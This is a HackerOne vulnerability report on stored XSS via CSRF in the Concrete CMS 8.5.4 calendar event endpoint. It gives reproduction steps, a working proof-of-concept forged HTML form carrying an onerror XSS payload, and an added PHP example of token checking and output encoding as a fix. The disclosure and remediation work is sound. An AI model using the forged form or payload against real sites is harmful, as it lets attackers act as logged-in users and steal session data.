HackerOne report H1:1102018 by d3addog
History: Feb 12, 2021 - 8:43 a.m.

Concrete CMS: Stored unauth XSS in calendar event via CSRF

2021-02-12 08:43:11
d3addog
hackerone.com
28

0.001 Low

EPSS

Percentile

30.9%


Description

The description parameter of the endpoint /index.php/ccm/calendar/dialogs/event/add/save is affected by Stored XSS because user-supplied data is not filtered or encoded. It should also be mentioned that this endpoint does not verify the CSRF token ccm_token, which makes it possible to perform a CSRF attack using a specially crafted web page.

Testing setup:

Concrete5 CMS version: 8.5.4
PHP Version: 7.2.24

Steps to reproduce

  1. Log in to your privileged account
  2. Create a web page containing the following code (do not forget to change the form action URL to your testing server)
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://<YOUR CONCRETE5 TESTING SERVER IP>/index.php/ccm/calendar/dialogs/event/add/save" method="POST">
      <input type="hidden" name="caID" value="1" />
      <input type="hidden" name="name" value="csrf_xss" />
      <input type="hidden" name="description" value="<img src=x onerror=alert(document.domain)>" />
      <input type="hidden" name="cID" value="0" />
      <input type="hidden" name="event_repetitionSetID[]" value="1234" />
      <input type="hidden" name="event_repetitionID_1234" value="0" />
      <input type="hidden" name="event_pdStartDate_pub_1234" value="2/12/21" />
      <input type="hidden" name="event_pdStartDate_1234" value="2021-02-12" />
      <input type="hidden" name="event_pdStartDateSelectTime_1234" value="11:00am" />
      <input type="hidden" name="publishAction" value="approve" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

  3. Open the web page from step 2 in the same browser where you are logged in to the account from step 1 and click the “Submit request” button
  4. Navigate to the calendar tab, select the created event and click “Details”.
  5. After opening “Details” the XSS payload will fire
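The report names two missing server-side controls on the save endpoint: no verification of the ccm_token CSRF token, and no encoding of the description before it is rendered on the event details page. The following is an added example (not Concrete CMS code and not the reporter's PoC) of a minimal event-save handler in plain PHP that applies both controls. The helper names (issue_csrf_token, handle_event_save, render_event_details) and the session key are hypothetical; the form field names are taken from the PoC above, and the request data is constructed inline so the script runs offline.

```php
<?php
// Added example, not Concrete CMS code. Shows the two controls the report
// says the /index.php/ccm/calendar/dialogs/event/add/save endpoint lacks:
// CSRF token verification and HTML encoding of the description on output.
// Helper names and the session key are hypothetical.

declare(strict_types=1);

// Issue a per-session CSRF token (hypothetical helper, not the CMS's own).
function issue_csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Compare the submitted ccm_token with the session token in constant time.
function csrf_token_is_valid(array $post, array $session): bool
{
    $submitted = $post['ccm_token'] ?? '';
    $expected  = $session['csrf_token'] ?? '';
    if (!is_string($submitted) || $submitted === '' || $expected === '') {
        return false;
    }
    return hash_equals($expected, $submitted);
}

// Handle the save request; returns an HTTP status and, on success, the event.
function handle_event_save(array $post, array $session, array &$events): array
{
    if (!csrf_token_is_valid($post, $session)) {
        // A cross-site form post carries no valid token: reject before any state change.
        return ['status' => 403, 'error' => 'invalid or missing CSRF token'];
    }
    $name        = trim((string)($post['name'] ?? ''));
    $description = (string)($post['description'] ?? '');
    if ($name === '') {
        return ['status' => 400, 'error' => 'name is required'];
    }
    // Store the raw text; encoding is applied at render time (see below).
    $events[] = ['name' => $name, 'description' => $description];
    return ['status' => 200, 'event' => end($events)];
}

// Encode a string for an HTML text context.
function html_encode(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Render the event details so that stored markup is shown as text, not executed.
function render_event_details(array $event): string
{
    return '<h2>' . html_encode($event['name']) . '</h2>'
         . '<p>' . html_encode($event['description']) . '</p>';
}

// Demonstration with constructed input mirroring the PoC form fields.
$session = [];
$events  = [];
$token   = issue_csrf_token($session);

// A forged cross-site post has no way to include the victim's session token.
$forged = [
    'caID'        => '1',
    'name'        => 'csrf_xss',
    'description' => '<img src=x onerror=alert(document.domain)>',
];
// The legitimate form from the CMS's own page carries the token.
$legit = $forged + ['ccm_token' => $token];

$rejected = handle_event_save($forged, $session, $events);
echo 'forged request status: ', $rejected['status'], PHP_EOL;
echo 'events stored after forged request: ', count($events), PHP_EOL;

$saved = handle_event_save($legit, $session, $events);
echo 'legitimate request status: ', $saved['status'], PHP_EOL;
echo render_event_details($saved['event']), PHP_EOL;
```

Run it with `php example.php`. The forged request is refused with 403 and stores nothing, while the legitimate request succeeds and the details page prints the `<img>` payload as inert text rather than executing it. Checking the token before any state change is the important ordering: validating after the insert would still leave a stored payload behind.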

Credits

This bug was found as a part of Solar Security CMS Research, with https://hackerone.com/d0bby, https://hackerone.com/wezery0, https://hackerone.com/silvereniqma in collaboration. Can you, please, add them to this report?

Impact

A malicious attacker can potentially obtain sensitive information or perform actions on the user's behalf.
